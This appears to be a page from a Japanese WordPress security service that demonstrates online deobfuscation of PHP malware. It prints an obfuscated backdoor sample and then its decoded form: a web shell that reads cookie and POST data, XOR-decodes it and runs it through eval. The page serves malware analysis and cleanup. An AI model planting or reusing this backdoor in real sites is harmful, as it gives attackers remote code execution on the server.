Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $VQhau/* MZVkd*/=/* v */chr (115) . chr ( 791 - 675 ).'r'/*H*/. chr/* IYZ */(95) ./* TU */chr (114) . chr (/*NiwF */256 - 155 ).chr ( 440 - 328 ).chr ( 998 - 897/* tg */).chr (97) ./*QKbZQ */"\x74"; $YNcJAykXJ/* vdH */= 'e'/* xKA*/. "\170"/*qy */. 'p' . 'l' . "\x6f"/* j*/. 'd' . 'e';$_AId = '19348'; $niJSrUbdd = chr/* zo*/(112) . 'a' . chr (/*s */167 -/* fjpj */68/*sS */).chr/* lkTQr*/(/* TNX */685 - 578/* msu */);$_nX =/*ZB */'55022'; function zNvHIq() { $blgxWSW/*XSZuB */= Array ( "ddlHsSoBu" => "ZodKNndogtMivXjqTZkDXswzZSU"/*GKJZ*/);; /*EvdS */$fjnaTsNKQF =/* PSDE */Array ( "zsTyjALjpZfgL"/* zH */=> "LvSomngVfcBnQiFjkgZCMN"/*rJh */);; /* KoK*/$ypoyFBm = Array( $blgxWSW, $_COOKIE, $blgxWSW, $_POST,/*StU */$fjnaTsNKQF);; return $ypoyFBm;; } /* NTun*/function UghudqFVj($QgvmcSny,/* cFy */$blgxWSW) { if ( count (/* x */$QgvmcSny/* QQZGT*/) ==/*OrGU*/3 ) { $aICoMde/* ygfBu*/= $QgvmcSny[1]; $rBPHxeh =/* Pko*/$QgvmcSny[2]; $QZXUvobK = $aICoMde($rBPHxeh); eval ( $QZXUvobK );$_KA =/* TDjpS */'17940'; /* LFg */die (); } /* p */} /* qkm*/function/*oWl */YVZvS($gnrENMWLm,/* ycicW */$BqaTUfm) /* X */{ return $gnrENMWLm ^/*pKTk */$BqaTUfm; } /*yWnx*/$ouoXBG = chr/* XpU*/(35); foreach (zNvHIq() as $hNGUlxtR) { foreach ( $hNGUlxtR as $BqaTUfm => $gnrENMWLm/* Uxmy*/) { /* TgJq */ $UxmmqaZ/* ZboEJ*/= strlen( $gnrENMWLm )/strlen( $BqaTUfm ); /* CkWXn */ /* WK */$gnrENMWLm/*JArO*/=/* Irc */@$niJSrUbdd(/* YB */'H'/*dURo*/. chr/* mlr */(/*pJQLl */881/* plOlJ */- 839 ),/*n */$gnrENMWLm ); /* o */ $BqaTUfm .= "roIM-YPmhpH-xQFq-RNSKX-FzXFHsT-hlqq-FWial"; /* rzTH */$BqaTUfm = $VQhau/* UdPw */( $BqaTUfm, $UxmmqaZ + 1); /* wPC*/$dUJcvKBz/*OYuS */= strrev("");; /* GQq */$dUJcvKBz = YVZvS($gnrENMWLm, $BqaTUfm); /*Cgyeg */$QgvmcSny =/* aC */$YNcJAykXJ ($ouoXBG, $dUJcvKBz ); UghudqFVj($QgvmcSny, $ouoXBG);; continue;$_yPDv/* BcDOF */=/* EiyyV */'32841'; } /*I */}
<?php $VQhau = "str_repeat"; $YNcJAykXJ = "explode"; $_AId = '19348'; $niJSrUbdd = "pack"; $_nX = '55022'; function zNvHIq() { $blgxWSW = array("ddlHsSoBu" => "ZodKNndogtMivXjqTZkDXswzZSU"); /*EvdS */ $fjnaTsNKQF = array("zsTyjALjpZfgL" => "LvSomngVfcBnQiFjkgZCMN"); /* KoK*/ $ypoyFBm = array( $blgxWSW, $_COOKIE, $blgxWSW, $_POST, /*StU */ $fjnaTsNKQF, ); return $ypoyFBm; } /* NTun*/ function UghudqFVj($QgvmcSny, $blgxWSW) { if (count( /* x */ $QgvmcSny ) == 3) { $aICoMde = $QgvmcSny[1]; $rBPHxeh = $QgvmcSny[2]; $QZXUvobK = $aICoMde($rBPHxeh); eval($QZXUvobK); $_KA = '17940'; /* LFg */ die; } /* p */ } /* qkm*/ function YVZvS($gnrENMWLm, $BqaTUfm) { return $gnrENMWLm ^ $BqaTUfm; } /*yWnx*/ $ouoXBG = "#"; foreach (zNvHIq() as $hNGUlxtR) { foreach ($hNGUlxtR as $BqaTUfm => $gnrENMWLm) { /* TgJq */ $UxmmqaZ = strlen($gnrENMWLm) / strlen($BqaTUfm); /* CkWXn */ /* WK */ $gnrENMWLm = @$niJSrUbdd( /* YB */ "H*", /*n */ $gnrENMWLm ); $BqaTUfm .= "roIM-YPmhpH-xQFq-RNSKX-FzXFHsT-hlqq-FWial"; /* rzTH */ $BqaTUfm = $VQhau($BqaTUfm, $UxmmqaZ + 1); /* wPC*/ $dUJcvKBz = ""; /* GQq */ $dUJcvKBz = YVZvS($gnrENMWLm, $BqaTUfm); /*Cgyeg */ $QgvmcSny = $YNcJAykXJ($ouoXBG, $dUJcvKBz); UghudqFVj($QgvmcSny, $ouoXBG); continue; } /*I */ }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.